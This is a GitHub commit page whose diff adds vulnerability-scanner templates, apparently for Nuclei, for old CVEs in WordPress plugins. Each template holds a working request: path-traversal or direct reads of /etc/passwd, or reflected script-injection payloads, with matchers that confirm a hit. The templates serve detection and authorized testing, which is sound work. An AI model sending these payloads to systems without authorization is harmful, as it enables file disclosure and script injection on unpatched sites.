-
Notifications
You must be signed in to change notification settings - Fork 273
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
c1866e4
commit ef070c0
Showing
62 changed files
with
3,181 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241202 | ||
20241203 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2011-1669 | ||
|
||
info: | ||
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) | ||
author: daffainfo | ||
severity: high | ||
description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. | ||
reference: | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 | ||
- https://www.exploit-db.com/exploits/17119 | ||
- http://www.securityfocus.com/bid/47146 | ||
remediation: Upgrade to a supported version. | ||
classification: | ||
cve-id: CVE-2011-1669 | ||
tags: cve,cve2011,wordpress,wp-plugin,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0:" | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/18 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2011-5265 | ||
|
||
info: | ||
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
id: CVE-2012-5913 | ||
info: | ||
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2012-5913 | ||
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ | ||
tags: cve,cve2012,wordpress,xss,wp-plugin | ||
classification: | ||
cve-id: CVE-2012-5913 | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</sCripT><sCripT>alert(document.domain)</sCripT>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/21 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2013-3526 | ||
|
||
info: | ||
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 | ||
|
||
description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(1)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
id: CVE-2013-4625 | ||
info: | ||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625 | ||
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html | ||
- https://seclists.org/bugtraq/2013/Jul/160 | ||
- https://www.htbridge.com/advisory/HTB23162 | ||
remediation: Upgrade to Duplicator 0.4.5 or later. | ||
classification: | ||
cve-id: CVE-2013-4625 | ||
metadata: | ||
google-query: inurl:"/wp-content/plugins/duplicator" | ||
tags: cve,cve2013,wordpress,xss,wp-plugin | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/24 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
id: CVE-2015-1000012 | ||
|
||
info: | ||
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) | ||
author: daffainfo | ||
severity: high | ||
reference: | ||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.50 | ||
cve-id: CVE-2015-1000012 | ||
cwe-id: CWE-200 | ||
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
part: body | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2015-6920 | ||
info: | ||
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability. | ||
reference: | ||
- https://packetstormsecurity.com/files/133371/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920 | ||
classification: | ||
cve-id: CVE-2015-6920 | ||
tags: cve,cve2015,wordpress,wp-plugin,xss | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"></script><script>alert(document.domain)</script>' | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
id: CVE-2016-1000136 | ||
|
||
info: | ||
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin heat-trackr v1.0 | ||
reference: | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 | ||
- https://wordpress.org/plugins/heat-trackr | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-1000136 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '</script><script>alert(document.domain)</script>' | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2016-1000141 | ||
info: | ||
name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000141 | ||
cwe-id: CWE-79 | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000142 | ||
|
||
info: | ||
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=435 | ||
- https://wordpress.org/plugins/parsi-font | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-1000142 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2016,wordpress,wp-plugin,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '</script><script>alert(document.domain)</script>' | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2016-1000148 | ||
|
||
info: | ||
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: | ||
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 | ||
tags: cve,cve2016,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000148 | ||
cwe-id: CWE-79 | ||
description: "Reflected XSS in wordpress plugin s3-video v0.983" | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '</script><script>alert(document.domain)</script><"' | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
Oops, something went wrong.